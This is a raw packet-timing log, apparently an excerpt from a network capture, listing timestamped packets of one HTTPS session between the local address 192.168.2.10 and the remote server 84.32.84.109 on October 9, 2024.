Oct 9, 2024 16:16:02.374449015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.374492884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.374530077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.374531984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.374542952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.374557018 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.374579906 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.374612093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.374696970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.374717951 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.374726057 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.374742031 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.374762058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.374799967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.374806881 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.374840021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.374851942 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.374897003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.374902964 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.374944925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.374955893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.374999046 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.375077009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375157118 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375175953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.375181913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375196934 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.375253916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375294924 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.375303030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375335932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.375416040 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375493050 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.375499010 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375567913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375591040 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.375597000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375621080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.375650883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375720024 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375722885 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.375731945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375780106 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.375802994 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375880957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375904083 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.375911951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375924110 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.375958920 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.375998974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.376004934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.376066923 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.418464899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.418535948 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.418544054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.418557882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.418593884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.418612957 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.418622017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.418642044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.418730974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.455223083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.455310106 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.455336094 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.455343008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.455358028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.455401897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.455420017 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.455430031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.455447912 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.455497980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.455696106 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.455904961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.455931902 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.455939054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.455965996 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.456228018 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.456366062 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.456590891 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.456598997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.456654072 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.457447052 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.457604885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.457638979 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.457645893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.457662106 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.457664013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.457695961 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.457700968 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.457746983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.457797050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.457940102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.457948923 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.457998991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.458041906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458103895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458122015 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.458126068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458146095 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.458228111 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458246946 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.458252907 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458275080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.458416939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458456039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458482027 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.458483934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458498001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458513975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.458532095 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.458555937 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458576918 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.458585024 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458611012 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.458632946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458681107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.458687067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458730936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.458774090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458825111 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458826065 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.458834887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458898067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.458918095 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.458966970 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.458971977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.459028006 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.459100008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.459136009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.459156036 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.459163904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.459173918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.459177971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.459197044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.459202051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.459223986 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.459232092 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.459270954 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.459283113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.459345102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.506503105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.506552935 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.506586075 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.506586075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.506601095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.506642103 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.506643057 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.507049084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.507116079 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.542823076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.542866945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.542973995 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.542973995 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.542988062 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.543004990 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.543062925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.543062925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.543071985 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.543083906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.543346882 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.543354988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.543414116 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.543665886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.543694973 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.543744087 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.543750048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.543766975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.543860912 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.544054031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.544081926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.544121027 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.544126987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.544152975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.544195890 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.545520067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.545628071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.545648098 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.545656919 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.545682907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.545814991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.545844078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.545849085 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.545855045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.545917034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.545932055 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.545945883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.545967102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.545973063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.545989037 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.546034098 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.546034098 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.546076059 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.546196938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.546219110 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.546226025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.546258926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.546289921 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.546348095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.546416998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.546437979 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.546441078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.546478987 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.546545029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.547523975 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.547574043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.547605038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.547610044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.547616959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.547636986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.547657967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.547677040 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.547692060 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.547700882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.547723055 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.547734976 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.547743082 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.547774076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.547801971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.547827959 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.547835112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.547847033 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.547851086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.547873020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.547903061 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.547910929 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.547967911 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.594368935 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.594433069 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.594465017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.594468117 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.594485044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.594506025 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.594517946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.594543934 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.594553947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.594573021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.595344067 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.630678892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.630749941 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.630764008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.630819082 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.630878925 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.630925894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.630933046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.630978107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.631779909 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.631843090 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.631850004 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.631899118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.632055044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.632108927 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.632113934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.632163048 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.633686066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.633744955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.633750916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.633799076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.634191990 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.634249926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.634308100 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.634358883 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.634399891 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.634452105 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.634459972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.634512901 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.634686947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.634736061 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.634742022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.634790897 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.634798050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.634839058 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.634844065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.634908915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.635003090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.635059118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.635122061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.635175943 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.635181904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.635195017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.635272026 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.635305882 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.635313034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.635339975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.635402918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.635431051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.635474920 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.635474920 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.635485888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.635571003 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.635627031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.635643005 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.635648966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.635937929 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.675425053 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.682697058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.682789087 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.682825089 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.682840109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.682873964 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.682966948 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.718373060 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.718421936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.718452930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.718555927 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.718555927 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.718571901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.718892097 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.718996048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.719014883 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.719021082 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.719044924 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.719135046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.719173908 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.719181061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.719218969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.719598055 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.719655991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.719664097 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.719705105 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.721435070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.721642971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.721662998 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.721668005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.721690893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.721693993 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.721714973 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.721719980 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.721730947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.721735954 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.721771002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.721775055 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:02.721807003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:02.721847057 CEST	443	49723	84.32.84.109	192.168.2.10
